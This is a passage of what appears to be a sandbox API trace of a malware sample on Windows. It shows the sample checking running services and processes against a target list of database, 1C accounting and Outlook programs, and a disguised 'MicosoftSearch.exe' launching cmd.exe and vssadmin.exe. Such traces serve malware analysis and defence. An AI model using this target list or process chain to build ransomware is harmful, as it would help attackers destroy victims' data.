(lpString="WinHttpAutoProxySvc") returned 19 [0038.271] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0038.271] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0038.271] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0038.271] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0038.271] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0038.271] lstrlenW (lpString="Winmgmt") returned 7 [0038.271] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0038.271] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0038.271] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0038.271] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0038.271] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0038.271] lstrlenW (lpString="WPDBusEnum") returned 10 [0038.271] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0038.271] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0038.271] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0038.271] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0038.271] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0038.271] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xbc43e0 | out: hHeap=0xb10000) returned 1 [0038.271] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b0 [0038.274] Process32FirstW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0038.275] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0038.275] lstrlenW (lpString="System") returned 6 [0038.275] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0038.275] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0038.275] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0038.275] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0038.275] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0038.275] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0038.276] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0038.276] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0038.276] lstrlenW (lpString="smss.exe") returned 8 [0038.276] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0038.276] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0038.276] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0038.276] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0038.276] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0038.276] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0038.276] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0038.276] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0038.277] lstrlenW (lpString="csrss.exe") returned 9 [0038.277] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0038.277] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0038.277] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0038.277] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0038.277] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0038.277] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0038.277] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0038.277] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0038.278] lstrlenW (lpString="wininit.exe") returned 11 [0038.278] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0038.278] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0038.278] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0038.278] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0038.278] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0038.278] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0038.278] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0038.278] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0038.279] lstrlenW (lpString="csrss.exe") returned 9 [0038.279] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0038.279] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0038.280] lstrlenW (lpString="winlogon.exe") returned 12 [0038.280] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0038.281] lstrlenW (lpString="services.exe") returned 12 [0038.281] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0038.281] lstrlenW (lpString="lsass.exe") returned 9 [0038.281] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0038.282] lstrlenW (lpString="lsm.exe") returned 7 [0038.282] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.283] lstrlenW (lpString="svchost.exe") returned 11 [0038.283] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.284] lstrlenW (lpString="svchost.exe") returned 11 [0038.284] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.285] lstrlenW (lpString="svchost.exe") returned 11 [0038.285] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.286] lstrlenW (lpString="svchost.exe") returned 11 [0038.286] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.286] lstrlenW (lpString="svchost.exe") returned 11 [0038.286] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0038.287] lstrlenW (lpString="audiodg.exe") returned 11 [0038.287] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.288] lstrlenW (lpString="svchost.exe") returned 11 [0038.288] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.289] lstrlenW (lpString="svchost.exe") returned 11 [0038.289] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0038.289] lstrlenW (lpString="dwm.exe") returned 7 [0038.289] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0038.290] lstrlenW (lpString="explorer.exe") returned 12 [0038.290] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0038.291] lstrlenW (lpString="spoolsv.exe") returned 11 [0038.291] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0038.292] lstrlenW (lpString="taskhost.exe") returned 12 [0038.292] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.292] lstrlenW (lpString="svchost.exe") returned 11 [0038.292] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0038.293] lstrlenW (lpString="taskeng.exe") returned 11 [0038.293] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0038.294] lstrlenW (lpString="taskhost.exe") returned 12 [0038.294] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ingredients posters keywords.exe")) returned 1 [0038.295] lstrlenW (lpString="ingredients posters keywords.exe") returned 32 [0038.295] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="moderate-instruments-repairs.exe")) returned 1 [0038.296] lstrlenW (lpString="moderate-instruments-repairs.exe") returned 32 [0038.296] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sa_shape.exe")) returned 1 [0038.297] lstrlenW (lpString="sa_shape.exe") returned 12 [0038.297] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="confidence.exe")) returned 1 [0038.298] lstrlenW (lpString="confidence.exe") returned 14 [0038.298] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="jaguar_assist_dictionaries.exe")) returned 1 [0038.298] lstrlenW (lpString="jaguar_assist_dictionaries.exe") returned 30 [0038.298] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="blue.exe")) returned 1 [0038.299] lstrlenW (lpString="blue.exe") returned 8 [0038.299] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="newly debut.exe")) returned 1 [0038.448] lstrlenW (lpString="newly debut.exe") returned 15 [0038.448] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="symbols_garage_parents.exe")) returned 1 [0038.449] lstrlenW (lpString="symbols_garage_parents.exe") returned 26 [0038.449] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="archive.exe")) returned 1 [0038.450] lstrlenW (lpString="archive.exe") returned 11 [0038.450] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="defend.exe")) returned 1 [0038.450] lstrlenW (lpString="defend.exe") returned 10 [0038.450] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arservice.exe")) returned 1 [0038.451] lstrlenW (lpString="arservice.exe") returned 13 [0038.451] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr-programmer.exe")) returned 1 [0038.452] lstrlenW (lpString="rr-programmer.exe") returned 17 [0038.452] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="capability-ethernet-museums.exe")) returned 1 [0038.453] lstrlenW (lpString="capability-ethernet-museums.exe") returned 31 [0038.453] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="twistedmonton.exe")) returned 1 [0038.453] lstrlenW (lpString="twistedmonton.exe") returned 17 [0038.453] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arc plains.exe")) returned 1 [0038.454] lstrlenW (lpString="arc plains.exe") returned 14 [0038.454] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="americahousestip.exe")) returned 1 [0038.455] lstrlenW (lpString="americahousestip.exe") returned 20 [0038.455] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cats-exceed-photo.exe")) returned 1 [0038.456] lstrlenW (lpString="cats-exceed-photo.exe") returned 21 [0038.456] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="medical lectures.exe")) returned 1 [0038.457] lstrlenW (lpString="medical lectures.exe") returned 20 [0038.457] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="electronic.exe")) returned 1 [0038.457] lstrlenW (lpString="electronic.exe") returned 14 [0038.457] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="regression.exe")) returned 1 [0038.458] lstrlenW (lpString="regression.exe") returned 14 [0038.458] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="county.exe")) returned 1 [0038.459] lstrlenW (lpString="county.exe") returned 10 [0038.459] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0038.460] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0038.460] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0038.460] lstrlenW (lpString="dllhost.exe") returned 11 [0038.460] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0038.461] lstrlenW (lpString="dllhost.exe") returned 11 [0038.461] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0038.462] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0038.462] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x954, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0038.463] lstrlenW (lpString="cmd.exe") returned 7 [0038.463] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0038.463] lstrlenW (lpString="conhost.exe") returned 11 [0038.463] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x968, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0038.464] lstrlenW (lpString="vssadmin.exe") returned 12 [0038.464] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0038.465] lstrlenW (lpString="VSSVC.exe") returned 9 [0038.465] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 0 [0038.466] CloseHandle (hObject=0x1b0) returned 1 [0038.466] Sleep (dwMilliseconds=0x1f4) [0039.393] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x4232c98 [0039.393] EnumServicesStatusExW (in: hSCManager=0x4232c98, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 0 [0039.394] GetLastError () returned 0xea [0039.394] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x12c6) returned 0xbcaca8 [0039.394] EnumServicesStatusExW (in: hSCManager=0x4232c98, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xbcaca8, cbBufSize=0x12c6, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xbcaca8, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 1 [0039.395] CloseServiceHandle (hSCObject=0x4232c98) returned 1 [0039.395] lstrlenW (lpString="Appinfo") returned 7 [0039.395] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0039.395] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0039.395] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0039.395] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0039.395] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0039.395] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0039.395] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0039.395] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0039.395] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0039.395] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0039.395] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0039.395] lstrlenW (lpString="AudioSrv") 